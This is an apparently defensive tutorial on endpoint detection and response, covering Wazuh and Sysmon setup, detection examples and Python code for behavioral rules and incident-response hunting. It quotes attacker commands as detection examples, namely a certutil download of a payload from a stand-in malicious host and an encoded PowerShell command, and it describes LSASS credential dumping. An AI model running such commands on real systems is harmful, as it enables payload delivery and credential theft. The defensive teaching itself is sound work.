Traditional antivirus software compares files against a database of known malware signatures. Modern attackers have known for years how to bypass this — polymorphic code, fileless attacks, and living-off-the-land techniques render signature-based AV largely ineffective against targeted attacks. Endpoint Detection and Response (EDR) takes a fundamentally different approach.
AV vs EDR: The Core Difference
Traditional AV:
- Scans files for known malware signatures
- Blocks files that match known-bad patterns
- Reactive: only catches known threats
- No visibility into behavior after installation
EDR:
- Monitors behavior continuously (process creation, file access, network connections, registry changes)
- Uses ML and behavioral analysis to detect suspicious patterns
- Proactive: can catch zero-day threats by behavior
- Records telemetry for forensic investigation
- Can automatically isolate compromised endpoints
Simple analogy:
- AV = Checking ID at the door (can be faked)
- EDR = Monitoring cameras inside the building (behavior-based)
What EDR Monitors
EDR agents collect this telemetry continuously:
Process events:
- Process creation (parent-child relationships)
- Process injection (code into other processes)
- Memory allocation patterns
- Code execution from unusual locations
File system events:
- File creation, modification, deletion
- Files written to sensitive locations (System32, Startup)
- Executable files written by non-system processes
Network events:
- All outbound connections with process attribution
- DNS queries
- Unusual protocol usage
Registry events:
- Run keys (persistence mechanisms)
- AutoRun modifications
- Security policy changes
Authentication events:
- Login attempts
- Credential access (LSASS access)
- Token manipulation
Free and Open-Source EDR Options
Wazuh (fully free, open source) combines SIEM and EDR capabilities and is an excellent fit for SMBs.
# Install the Wazuh agent on Windows (PowerShell, run as Administrator; replace YOUR_WAZUH_MANAGER_IP with your manager's address), then start the agent service:
Invoke-WebRequest -Uri "https://packages.wazuh.com/4.x/windows/wazuh-agent-4.7.0-1.msi" -OutFile "wazuh-agent.msi"
Start-Process msiexec.exe -ArgumentList "/i wazuh-agent.msi WAZUH_MANAGER=YOUR_WAZUH_MANAGER_IP /q" -Wait
Start-Service -Name WazuhSvc
# Install on Linux (Debian/Ubuntu, as root; needs curl and gnupg): import the signing key, add the Wazuh repository, then install and start the agent
curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/4.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
apt-get update
WAZUH_MANAGER="YOUR_WAZUH_MANAGER_IP" apt-get install -y wazuh-agent
systemctl daemon-reload && systemctl enable --now wazuh-agent
# Configure Sysmon for enhanced Windows telemetry: download Sysmon from Sysinternals, save the SwiftOnSecurity config (github.com/SwiftOnSecurity/sysmon-config) as sysmonconfig.xml, and install with it:
sysmon64.exe -accepteula -i sysmonconfig.xml
Microsoft Defender for Endpoint (EDR tier, paid) is built into Windows and just needs the license activation; it offers excellent detection and deep Windows integration.
Key EDR Detection Examples
1. Detecting process injection (Cobalt Strike beacon):
- Alert: notepad.exe spawned a network connection
- Normal: notepad.exe NEVER makes network connections
- EDR flags: process behavior anomaly + network telemetry
2. Detecting LSASS credential dumping:
- Alert: lsass.exe memory read by a non-SYSTEM process (for example mimikatz.exe)
- Wazuh rule detects Event ID 4656 (handle requested for lsass.exe) from a process not in the whitelist
- Caveat: 4656 is only logged when object-access auditing with a SACL on lsass.exe is enabled; Sysmon Event ID 10 (ProcessAccess) is the usual source when that auditing is off
3. Detecting living-off-the-land attacks:
- Alert: certutil.exe downloading a file (abnormal usage), for example:
certutil.exe -urlcache -split -f http://malicious.com/payload.exe
- Normal: certutil manages certificates
- EDR behavioral rule: certutil + URL download = suspicious
4. PowerShell encoded commands:
- Attackers use Base64 encoding to evade detection:
powershell -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAA=
- EDR: alert on encoded PowerShell with network activity or process spawning
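The four detections above, written out as behavioral rules and run over constructed Sysmon-style telemetry. This is an added example, not code from the article, from Wazuh or from Sysmon: the event dicts are simplified stand-ins for Sysmon ProcessCreate (ID 1), NetworkConnect (ID 3) and ProcessAccess (ID 10) records, and the field names, the two allowlists, the sample PIDs, paths and IPs are all assumptions for this example. It also decodes the Base64 UTF-16LE `-enc` payload so the analyst sees the real command, and correlates encoded PowerShell with later network or child-process activity, which is the "with network activity or process spawning" half of rule 4.

```python
"""Behavioral EDR-style rules run over constructed endpoint telemetry.

Added example for this article; not code from the article, Wazuh or Sysmon.
Event dicts are simplified, constructed stand-ins for Sysmon events
(process_create ~ ID 1, network_connect ~ ID 3, process_access ~ ID 10).
Field names, allowlists and sample values are assumptions for this example.
"""
import base64
import re
from typing import Dict, List, Optional

# Constructed sample telemetry (not real logs). IPs are documentation ranges,
# the download URL uses the reserved .invalid TLD.
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process_create", "pid": 100, "ppid": 1,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "process_create", "pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"type": "network_connect", "pid": 200, "dest_ip": "203.0.113.10", "dest_port": 443},
    {"type": "process_create", "pid": 300, "ppid": 100,
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/payload.exe"},
    {"type": "process_create", "pid": 400, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAA="},
    {"type": "network_connect", "pid": 400, "dest_ip": "198.51.100.7", "dest_port": 8080},
    {"type": "process_create", "pid": 410, "ppid": 400,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"type": "process_access", "source_pid": 500, "source_image": r"C:\Users\bob\tool.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"type": "process_access", "source_pid": 4, "source_image": r"C:\Windows\System32\csrss.exe",
     "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1fffff"},
    {"type": "network_connect", "pid": 100, "dest_ip": "203.0.113.20", "dest_port": 443},
]

# Processes that never legitimately open network connections (assumption,
# mirroring the article's "notepad.exe NEVER makes network connections").
NO_NETWORK_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe"}
# Processes allowed to open a handle to lsass.exe (assumption; tune per estate).
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "lsass.exe", "msmpeng.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
ENC_RE = re.compile(r"[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE in Base64), or None."""
    match = ENC_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(events: List[Dict]) -> List[Dict]:
    """Run the article's four behavioral rules over an ordered event stream."""
    procs: Dict[int, Dict] = {}   # pid -> process_create event, for attribution
    encoded_pids = set()          # PowerShell processes launched with -enc
    alerts: List[Dict] = []

    def alert(rule: str, pid: int, detail: str) -> None:
        alerts.append({"rule": rule, "pid": pid, "detail": detail})

    for ev in events:
        kind = ev["type"]
        if kind == "process_create":
            procs[ev["pid"]] = ev
            name, cmd = basename(ev["image"]), ev["cmdline"]
            # Rule 3: living-off-the-land, certutil fetching a URL
            if name == "certutil.exe" and "-urlcache" in cmd.lower() and URL_RE.search(cmd):
                alert("lolbin_download", ev["pid"], cmd)
            # Rule 4: encoded PowerShell, decoded so the analyst sees the real command
            if name in {"powershell.exe", "pwsh.exe"}:
                decoded = decode_encoded_powershell(cmd)
                if decoded is not None:
                    encoded_pids.add(ev["pid"])
                    alert("encoded_powershell", ev["pid"], decoded)
            # Rule 4 follow-up: encoded PowerShell spawning a child process
            if ev["ppid"] in encoded_pids:
                alert("encoded_powershell_activity", ev["pid"], f"spawned {name}")
        elif kind == "network_connect":
            proc = procs.get(ev["pid"])
            name = basename(proc["image"]) if proc else "<unknown>"
            dest = f"{ev['dest_ip']}:{ev['dest_port']}"
            # Rule 1: a process that should never talk to the network did
            if name in NO_NETWORK_EXPECTED:
                alert("unexpected_network", ev["pid"], f"{name} -> {dest}")
            # Rule 4 follow-up: encoded PowerShell with network activity
            if ev["pid"] in encoded_pids:
                alert("encoded_powershell_activity", ev["pid"], f"network -> {dest}")
        elif kind == "process_access":
            # Rule 2: handle to lsass.exe from a process outside the allowlist
            if (basename(ev["target_image"]) == "lsass.exe"
                    and basename(ev["source_image"]) not in LSASS_ALLOWLIST):
                alert("lsass_access", ev["source_pid"],
                      f"{ev['source_image']} access {ev['granted_access']}")
    return alerts
```

Calling `evaluate(SAMPLE_EVENTS)` yields one alert each for the notepad.exe connection, the certutil download, the decoded PowerShell command (`$c=New-Object`) and the tool.exe handle to lsass.exe, plus two correlation alerts for the encoded PowerShell process (its outbound connection and the cmd.exe it spawned); explorer.exe's connection and csrss.exe's lsass access produce nothing. In a real deployment the two allowlists are the tuning surface: the notepad rule is deliberately strict, and the lsass allowlist has to be extended with whatever AV, backup and monitoring agents legitimately open lsass.exe in your environment.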
Incident Response with EDR
When EDR triggers an alert, you can:
1. Investigate the timeline: what happened 1 hour before the alert? What processes ran? What files were written? What network connections were made?
2. Isolate the endpoint (network isolation): EDR -> Endpoint -> Isolate. The machine stays on for forensics but its network traffic is blocked; the analyst can still connect via the EDR console.
3. Live response: many EDRs allow you to run commands, collect files, and take memory dumps WITHOUT physically touching the machine.
4. Hunt across all endpoints: "Show me all machines that executed this hash in the last 30 days", "Show me all machines that connected to this IP". Identify the scope of the breach across the entire fleet instantly.
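The timeline step (1) and the fleet-hunt step (4) above, as an added example in Python that is not the article's code nor any EDR vendor's API; the record layout, host names, placeholder hash values and IPs are constructed for this example. `timeline` answers "what happened in the hour before the alert" on one host, `hunt_hash` and `hunt_ip` answer the two fleet-wide questions with the 30-day window, and `scope_from_alert` chains them: it takes every hash and destination IP seen on the alerting host in that hour and finds which other hosts share them, which is how one alert turns into a breach scope.

```python
"""Incident-response queries over fleet telemetry: the hour-before-alert
timeline and fleet-wide hunts by file hash and destination IP.

Added example; not code from the article or from any EDR product. Record
layout, host names, hash values and IPs are constructed for this example.
"""
from datetime import datetime, timedelta
from typing import Dict, List

NOW = datetime(2025, 6, 1, 12, 0, 0)  # constructed "current time" for the hunts


def ts(text: str) -> datetime:
    return datetime.fromisoformat(text)


# Constructed fleet telemetry; every record carries host attribution.
# The sha256 values are placeholders, not real file hashes.
FLEET_EVENTS: List[Dict] = [
    {"host": "ws-01", "time": ts("2025-06-01T08:00:00"), "type": "process_create",
     "image": "outlook.exe", "sha256": "HASH_OUTLOOK"},        # outside the 1h window
    {"host": "ws-01", "time": ts("2025-06-01T10:05:00"), "type": "process_create",
     "image": "winword.exe", "sha256": "HASH_WINWORD"},
    {"host": "ws-01", "time": ts("2025-06-01T10:20:00"), "type": "process_create",
     "image": "powershell.exe", "sha256": "HASH_POWERSHELL"},
    {"host": "ws-01", "time": ts("2025-06-01T10:25:00"), "type": "file_write",
     "path": r"C:\Users\bob\AppData\Roaming\update.exe", "sha256": "HASH_UPDATE"},
    {"host": "ws-01", "time": ts("2025-06-01T10:40:00"), "type": "network_connect",
     "dest_ip": "198.51.100.7"},
    {"host": "ws-01", "time": ts("2025-06-01T11:00:00"), "type": "alert",
     "detail": "lsass.exe handle requested by update.exe"},
    {"host": "ws-07", "time": ts("2025-05-20T09:00:00"), "type": "process_create",
     "image": "update.exe", "sha256": "HASH_UPDATE"},
    {"host": "ws-07", "time": ts("2025-05-20T09:01:00"), "type": "network_connect",
     "dest_ip": "198.51.100.7"},
    {"host": "srv-02", "time": ts("2025-04-01T09:00:00"), "type": "process_create",
     "image": "update.exe", "sha256": "HASH_UPDATE"},           # older than 30 days
    {"host": "ws-12", "time": ts("2025-05-30T15:00:00"), "type": "network_connect",
     "dest_ip": "203.0.113.9"},
]


def timeline(events: List[Dict], host: str, alert_time: datetime,
             window: timedelta = timedelta(hours=1)) -> List[Dict]:
    """Step 1: everything recorded on `host` in the window ending at the alert, oldest first."""
    start = alert_time - window
    hits = [e for e in events if e["host"] == host and start <= e["time"] <= alert_time]
    return sorted(hits, key=lambda e: e["time"])


def hunt_hash(events: List[Dict], sha256: str, now: datetime = NOW, days: int = 30) -> List[str]:
    """Step 4: hosts that executed or wrote a file with this hash in the last `days` days."""
    cutoff = now - timedelta(days=days)
    return sorted({e["host"] for e in events if e.get("sha256") == sha256 and e["time"] >= cutoff})


def hunt_ip(events: List[Dict], ip: str, now: datetime = NOW, days: int = 30) -> List[str]:
    """Step 4: hosts that connected to this IP in the last `days` days."""
    cutoff = now - timedelta(days=days)
    return sorted({e["host"] for e in events if e.get("dest_ip") == ip and e["time"] >= cutoff})


def scope_from_alert(events: List[Dict], host: str, alert_time: datetime,
                     now: datetime = NOW) -> List[str]:
    """Pivot from one alert to breach scope: every hash and destination IP seen on the
    alerting host in the hour before the alert, hunted across the whole fleet."""
    recent = timeline(events, host, alert_time)
    affected = set()
    for sha in {e["sha256"] for e in recent if "sha256" in e}:
        affected.update(hunt_hash(events, sha, now))
    for ip in {e["dest_ip"] for e in recent if "dest_ip" in e}:
        affected.update(hunt_ip(events, ip, now))
    return sorted(affected)
```

For the constructed data, the ws-01 timeline shows the Word document, the PowerShell launch, the dropped update.exe and the outbound connection that preceded the LSASS alert; hunting the dropped file's hash and the destination IP across the fleet adds ws-07 to the scope, while srv-02 falls outside the 30-day window and ws-12 shares nothing with the alerting host. Real EDR consoles run the same queries over their own telemetry store; the point of writing it out is to see that "scope the breach" is just the timeline's indicators pushed back through the fleet-wide hunt.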
Wrap Up
Traditional AV is necessary but not sufficient in 2025. EDR adds the behavioral monitoring layer that catches attacks that bypass signature detection. For small businesses: start with Wazuh (free) + Sysmon. For larger organizations: Microsoft Defender for Endpoint, CrowdStrike Falcon, or SentinelOne provide enterprise-grade EDR. The telemetry EDR provides is also invaluable for incident response investigations.